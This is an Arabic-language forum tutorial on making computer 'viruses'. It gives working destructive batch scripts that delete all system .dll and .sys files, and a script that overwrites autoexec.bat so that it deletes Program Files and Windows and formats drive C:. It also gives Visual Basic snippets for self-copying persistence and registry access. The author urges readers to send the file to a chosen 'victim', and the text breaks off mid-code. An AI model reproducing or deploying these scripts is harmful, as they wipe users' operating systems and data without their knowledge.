السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله الطاهرين
اليوم انشا الله اشرح لكم كيفية صنع اخطر الفيروسات
-----------------------------------------------------------------
قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن
تعريف الفيروس:
يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا او اعتمادا على احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسها بناء على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو تشيرنوبل الذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الأسم نسبة الى الفيروسات الموجودة فى جسم الأنسان و التى تصيبه و تتكاثر بسرعة فيه و هى نفس فكرة عمل الفيروس الذى يصيب الكومبيوتر
و يجب توافر عدة شروط لكى يصبح الفيروس ذو فاعلية و هى
أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه
أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباط باحد الملفات
أن يكون ذا هدف و مغزى
الأن و بعد ان فهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم
ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا
*·~-.¸¸,.-~*اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجو ان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اى خطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحذر من تصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها*·~-.¸¸,.-~*
الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فى صناعة الفيروسات
لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة من الطرق لتصميم الفيروسات و هى
عن طريق الـnotepad اوالمفكرة
عن طريق برنامج الفجول بيسك (vb)
عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)
و سوف اقوم الأن بعرض كل منهم على حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقوم به
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلم تصميم الفيروس بواسطة notepad او المفكرة
للعمل على تصميم فيروس بهذا النوع من التصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat
و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسب لك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كان لديك
ملاحضة اذا انت حبيت ان ترى غيروسك بام عينيك ما عليك الى حفضه في مجلد جديد في سطح المكتب بدون ان تغلق المفكره وكتابه الكود وسوف تراه,
قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولة طبعا ولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه
اريد ان اوضح انه من الأفضل نسخ الكود و لصقه فى المكان الذى تريده
----------------------
نبدأ بالكود الأول :
---------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اول الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:
مثال توضيحى :
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه
الخاصــــــــــــــية الثانيه :-
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
الرئيسية 
أحدث الصور 
التسجيل 
دخول 
الثلاثاء أبريل 07, 2009 1:58 pm
